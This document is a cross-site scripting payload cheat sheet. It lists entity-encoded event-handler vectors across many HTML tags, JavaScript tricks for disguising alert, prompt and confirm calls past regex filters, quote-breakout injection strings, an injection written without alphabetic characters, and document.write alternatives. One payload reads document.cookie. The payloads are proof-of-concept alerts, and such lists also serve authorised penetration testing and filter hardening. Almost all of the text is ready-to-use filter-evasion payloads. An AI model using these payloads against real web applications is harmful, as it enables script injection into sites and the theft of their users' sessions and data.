🔵Obfuscation, Filter Bypass alert event

Obfuscating alert event

--------------------------------------------------------------------
<!-- Alerts -->

<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>
<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>
<div onmouseover=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>Hover me</div>
<div ondblclick=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>Double-click me</div>
<body onload=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>
<input type="text" onfocus=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>
<button onclick=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>Click me</button>
<body onkeydown=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>

_____________________________________________________________________________________________________
<!-- Prompts -->

<img src=x onerror=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>
<button onclick=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>Click me</button>
<body onkeydown=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>
<textarea onselectstart=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>Select me</textarea>
<form onsubmit=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)><input type=submit></form>
<select onchange=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)><option>Choose</option></select>
<input oncopy=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain) value="Copy me">
<button ontouchstart=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>Touch me</button>
_____________________________________________________________________________________________________
<!-- Confirmations -->

<img src=x onerror=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)>
<button onclick=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)>Click me</button>
<div onmousedown=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)>Mouse down</div>
<input onblur=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)>

_____________________________________________________________________________________________________
<!-- Other events -->

<a oncontextmenu=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain) href="#">Right-click me</a>
<button onmouseenter=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)>Mouse enter</button>
<input onwheel=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>

_____________________________________________________________________________________________________
<!-- More tags -->

<details ontoggle=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)><summary>Toggle me</summary></details>
<progress oninput=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain) value=50 max=100></progress>
<output onforminput=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)></output>
<abbr title="Abbreviation" onmouseover=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>Hover me</abbr>
<code onclick=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>Click me</code>

_____________________________________________________________________________________________________
<!-- Additional Events -->

<div onmousemove=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)>Mouse move</div>
<button onmousedown=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>Mouse down</button>
<input onselect=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)>
<select ondblclick=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)><option>Double-click me</option></select>
<textarea onfocus=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>Focus me</textarea>
<a onmouseout=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain) href="#">Mouse out</a>
<button ontouchend=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>Touch end</button>

_____________________________________________________________________________________________________
<!-- Additional Tags -->

<fieldset onreset=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)><legend>Reset me</legend></fieldset>
<small onmouseenter=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>Mouse enter</small>
<mark onmouseup=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>Mouse up</mark>
<blockquote onmousedown=&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;(document.domain)>Mouse down</blockquote>
<sub onclick=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>Click me</sub>
<sup oncontextmenu=&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;(document.domain)>Right-click me</sup>
<dfn ondblclick=&#x61;&#x6C;&#x65;&#x72;&#x74;(document.domain)>Double-click me</dfn>

---------------------------------------------------------------

Filter Bypass Alert Obfuscation

(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
globalThis[/al/.source+/ert/.source]`1` 
[alert][0].call(this,1)
(1,2,3,4,5,6,7,8,alert)(1)
top['al\x65rt'](1)
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])


confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

self[`aler`%2b`t`]`1`
'new Function`al\ert\`1\``'
'new Function`pro\mpt\`1\``'

alert(document['cookie']) 
with(document)alert(cookie) 
eval('ale'+'rt(1)')window['alert'](0)
parent['alert'](1)
self['alert'](2)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[12].forEach(alert);
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;

alert.call(null, document.domain);
[document.domain].forEach(alert);
alert.apply(null, [document.domain]);
alert.bind()(document.domain);
alert(this['document']['domain']);
(new Map()).set(1, document.domain).forEach(alert);

[class extends[alert````]{}]
```${``[class extends[alert``]{}]}```
[class extends[alert````]{}]
throw new class extends Function{}('alert(1)')``
x=new class extends Function{}('alert(1)'); x=new x;
new class extends alert(1){}
new class extends class extends class extends class extends alert(1){}{}{}{}
   
alert?.()
confirm?.()
prompt?.()
`(alert())`

---------------------------------------------------------------

Alert Injection Variations

All regular ways to break out from delimiters and inject alert(1) fixing the remaining syntax (without comments).

'-alert(1)-' '+alert(1)+' '>>>alert(1)>>>'   '&alert(1)&'   1'?alert(1):'
'/alert(1)/' '<alert(1)<' '>=alert(1)>='     '^alert(1)^'   '[alert(1)]-'
';alert(1);' '<<alert(1)<<' '==alert(1)=='   '|alert(1)|'   '(alert(1))-'
'*alert(1)*' '<=alert(1)<=' '===alert(1)===' '||alert(1)||' 
'**alert(1)**' '>alert(1)>' '!=alert(1)!='   '%0Aalert(1)%0A'
'%alert(1)%' '>>alert(1)>>' '!==alert(1)!==' '%0Dalert(1)%0D'

---------------------------------------------------------------

JS Injection without Alphabetic Chars

Use when alphabetic characters are not allowed. Following is alert(1).

--------------------------------------------------------------------
[]['\160\157\160']['\143\157\156\163\164\162\165\143\164\157\162']('\
141\154\145\162\164\501\51')()

[]['\160\157\160']['\143\157\156\163\164\162\165\143\164\157\162']`\
x61\x6C\x65\x72\x74\x281\x29```
--------------------------------------------------------------------

---------------------------------------------------------------

Alert Obfuscation

Use to trick several regular expression (regex) filters. It might be combined with previous alternatives (above). The shortest option “top” can also be replaced by “window”, “parent”, “self” or “this” depending on context.

(alert)(1)
a=alert,a(1)
[1].map(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)

---------------------------------------------------------------

Alert Obfuscation - Optional Chaining

Use to trick several regular expression (regex) filters. It might be combined with previous alternatives (above).

alert?.(document?.domain)
[document?.domain]?.map?.(alert)
top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source])

---------------------------------------------------------------

Alert Alternative – Write & Writeln

Use as an alternative to alert, prompt, and confirm. If used within an HTML vector it can be used as it is but if it’s a JS injection the full “document.write” form is required. Replace “&” with “%26” and “#” with “%23” in URLs. Write can be replaced by writeln.

write`XSSed!`
write`<img/src/o&#78error=alert&lpar;1)&gt;`
write('\74img/src/o\156error\75alert\501\51\76')

---------------------------------------------------------------